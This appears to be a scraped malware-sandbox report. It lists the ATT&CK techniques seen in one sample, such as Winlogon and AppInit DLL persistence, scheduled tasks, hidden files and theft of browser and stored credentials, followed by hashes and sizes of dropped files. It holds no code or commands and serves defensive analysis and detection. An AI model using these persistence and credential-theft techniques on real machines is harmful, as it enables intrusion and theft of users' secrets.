1Persistence
Boot or Logon Autostart Execution
1Winlogon Helper DLL
1Event Triggered Execution
1AppInit DLLs
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Winlogon Helper DLL
1Event Triggered Execution
1AppInit DLLs
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Hide Artifacts
1Hidden Files and Directories
1Modify Registry
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
152B
MD5425248739d77afa964e1a893d2ea5a94
SHA1ae91c41cde6ffe01839ae7e61b193c241d18a513
SHA256816b3a135562fe43c926caa3e9f2b6271ec5fd7e44d6a05dbc6d7cf9504aa254
SHA512c4dde9efb7f500f7216d83e9327b03a1905568da3a7346668100792d4309fce8ac2ef1fe6124ae06a4686762b4b41d5ab7a64343c446b60c301c8283d9547c37
-
Filesize
283KB
MD51fdf29fb68d0327ef21f54c644a5e5f7
SHA1064a8c39517bc9b08e8f27a9a5cf31f22aa275ca
SHA256b60295370110a4d49f3f4b29296d7fd598cbe6443272e612749155c8f0381571
SHA512b5181fab5e69cc7ce1ebe8f59df7ebce49f759eb46ea3a3d73ffab5ccfe2ec57e071e94e027e13278543852abd7e579fce25286e96335562952efac0a6f1fdb8
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize144B
MD53e5e1119d89877b6025129c9db7f6913
SHA16761fe8e397350f40eff53f3d314c579160c85d4
SHA25637ab6d841b44aa91b645b01d67d912ceb64bd42972bebd631ff60f59072493f4
SHA512910a52f7b2c69ef724db6354080942ca247e22bd9f2131a183080f95a54541b7d229c392babf22ad7e16ae4541838ad45c11c202344fa25fd6259a45fec692e0
-
Filesize
20KB
MD543e2b4ccb64e3cc69316ae7f229cf73a
SHA159ab3215fad69db77120a1ae56a9870ae20ec8cd
SHA256bc664315c1ee83af3768d3bd1371e9f8cb9d8a181dc92340a085165058b4bb34
SHA512ed091d0ed038bcde431ff3fc687e6989c4914f1c6ba4e4c00989d4ecc0646382603d6d888e92a351f4aa5b52d3ff096718d5d90424d66fd72a9300e448aac7ff
-
Filesize
124KB
MD554e62193af99c59df64aedf85b3c8a10
SHA1ef7f889c934fdf4dd749c92f4d26571053a5c156
SHA256007ba524ee335e80683a64c4504a448d165dc251d337be848f0f484abfccc804
SHA512e6161dd88ed23feef79b7ac121db318be4a7500152c5fba64db5570355ec002e34a4174369bdb042cd5894b8e8d0255fc5ac1e8470647d9015994ff03404b1ae
-
Filesize
111B
MD5285252a2f6327d41eab203dc2f402c67
SHA1acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6
SHA2565dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026
SHA51211ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d
-
Filesize
930B
MD59f9048f2157f63143e0f48fb999b7a7e
SHA1daeda0cb45f09ac72143674dba0589ac7a9a3a1c
SHA2560b554038b53b4e5a06aa95be97de4f80d3d0120f4e9d6c4f3c505f8bf1484564
SHA5127bd00c69505faca0e07572ba0e0a32d315807a1243485d93318b3807df4c0eee1d796b4a9b16f3934044c52b0b5ecda46ec9ef5800188b2377dcdf65aa555a1f
-
Filesize
1KB
MD55a40605f39f83de449f855008753a566
SHA114a18ae86758a36449823128a9546caa845ad75f
SHA25690f26ee89d1006c513268fbad387d99fd7b0b0ed135e8e905c84be0b2492319c
SHA512a81386bc034002d019622dffa1f082d5be7835cd046e2ad49cc38c4b491527561518f2893c2b99183de6bf3049fbaeb4338ff4e06283ace4d33da00ffc8ffcfe
-
Filesize
6KB
MD58e0bae28e912b3e9f6b36df981054335
SHA1eceeb9f934af3e54e9890c424c38497860b56e1b
SHA256dd1a02eedb8946a9d8b5147d7433212cb0d89b8bf12568c92959dd21f161228d
SHA512de5805a4d8b3e9731a2ff7806ac3c5a3d0dc3e0cced462e6fd01d1199484874f2d3d86fd932315bfef98d6170ebd9287f71c7d52552b66ea1bd1a52346f13192
-
Filesize
5KB
MD5f13166f8c67cce1fae5fbf407a12054f
SHA1de51e479b413f317b4ba571bcb3ca1d0ecfbf218
SHA2563c0f14f76e83f0e48037f93cf501b427f7a72f1a0316678fd4c5b6ca5be6dd57
SHA5127afcb28b93d8887d2f9a184f50cbc41070706d2320621c6fb43808000054e87fcb3a90ae24102488c5d316482047d37cc6d16c6b896f11a5c3bc4002fcabb675
-
Filesize
24KB
MD5dcb3a22320d5a33a1efa1b4847ea4bcb
SHA1a593fdbecd26610c1891961c378941baf8560398
SHA25633e7feba556087bb8a0abd289b518350b77d05b7a551700fad1955048e59ef85
SHA5120ebb797fc67e557d0960f80e5c039efc238cb64edc3a7fccc39eb2142ada726ed91498e83abb725017953c3c900943364793c8e6f952a7c2784e27748d83d2b0
-
Filesize
112KB
MD5e03fc0ff83fdfa203efc0eb3d2b8ed35
SHA1c705b1aa42d84b3414fdc5058e0fa0a3dc9e1664
SHA25608d550d1866b479c6c41ebbda7b453dba198ee8744a52c530ff34458024ee1fe
SHA512c0840930d7a9cf16e8fbefefd09c564eabfcfb6e9df1f9b906b830e8218a818c3f9721f9ce1fc2a96b2e6ce725baba0dcd5810a9b55d20b3c9d6f4569b9008a2
-
Filesize
16B
MD56752a1d65b201c13b62ea44016eb221f
SHA158ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA2560861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA5129cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
-
Filesize
10KB
MD5f728116f21163f6fa60a797da6bfd6cc
SHA13378d651d43abffea36bc9aca42d9adeb41d711d
SHA256c8c110d30d4e902e1282af79c9c3283e32495ab6a82d38fd605186fd2f30b237
SHA512eea2d1e3774e7b4af43f769590ebf0949b1a6de457c40f10fec0fafa6af21c35b9741f6020a013e11ca87bbd1bd3efd111d5581c5f444449b04cd0d14ce25370
-
Filesize
10KB
MD58736de0781de202e5be801d75546bd88
SHA1db382676235d2b65aff99c37bcb26821f1356610
SHA256df2eb5e0b64a1ba0b7104e412c8a861765a07e9a59dbd8b66f9c466b99144d51
SHA512a5484e18fc50442b981a1c01fae3c1f73c79e2c8ffb3a2a33680e73a9c53936698d40740241432b3fe29f974508d627bd52bea8580499d2527c4d66c43fa551d
-
Filesize
105B
MD52e9d094dda5cdc3ce6519f75943a4ff4
SHA15d989b4ac8b699781681fe75ed9ef98191a5096c
SHA256c84c98bbf5e0ef9c8d0708b5d60c5bb656b7d6be5135d7f7a8d25557e08cf142
SHA512d1f7eed00959e902bdb2125b91721460d3ff99f3bdfc1f2a343d4f58e8d4e5e5a06c0c6cdc0379211c94510f7c00d7a8b34fa7d0ca0c3d54cbbe878f1e9812b7
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
29B
MD587e77adcbe40991e28b91bce6a02f996
SHA17bee296879fb13ddd1ce42eabf77d04eb5553915
SHA25697109404dd67bb897545c5d886bc472c7bb25bef10e187a6b78b74d80b644bb8
SHA51206d83e5ee3ebbb7a1a6a86cebde1689f8266af735d2e9b6ea6be596ffe524656fb338559f3525674a60821f1127595ac9c1cedbf9ecef8f1dee40cf71adfbe59
-
Filesize
74B
MD5c7f4412424e593facb6c533276d517bf
SHA1fa44837d6e8c87da4a85b17d5801af43789bab9f
SHA256e5043dbea2de04275642b47dc501dda26675f7051ab1a3c2e0511a9084811a28
SHA5128dd5a1ec3002637c77437b98590dcd501d621261bc105c55d83d7ec4fca1e4ef599c51f8b3f2e57e9a049b3e623cfc27414785d628369452e3c94adcb5536c9f
-
Filesize
7KB
MD5aa5d13590623abb5d3963a8af5dfb85d
SHA18dcb62e75f970ac4f9f78e2558f335951b599774
SHA2564c6183029dcf2e4d604c473c2dfb4f72037b6a8f13d9183b0842fd201e422d7a
SHA51294899bfebc29d4d76c1a8d0e9b787ae50386a5e8718194791d27d86eb7e67e1b0e1a9b0a4e68031905c767419bd767b9d2666ac5ffd0a8dd87c0bf842ac7282b
-
Filesize
136KB
MD516e5a492c9c6ae34c59683be9c51fa31
SHA197031b41f5c56f371c28ae0d62a2df7d585adaba
SHA25635c8d022e1d917f1aabdceae98097ccc072161b302f84c768ca63e4b32ac2b66
SHA51220fd369172ef5e3e2fde388666b42e8fe5f0c2bfa338c0345f45e98af6561a249ba3ecc48c3f16efcc73f02ecb67b3ddb1e2e8f0e77d18fa00ac34e6379e50b6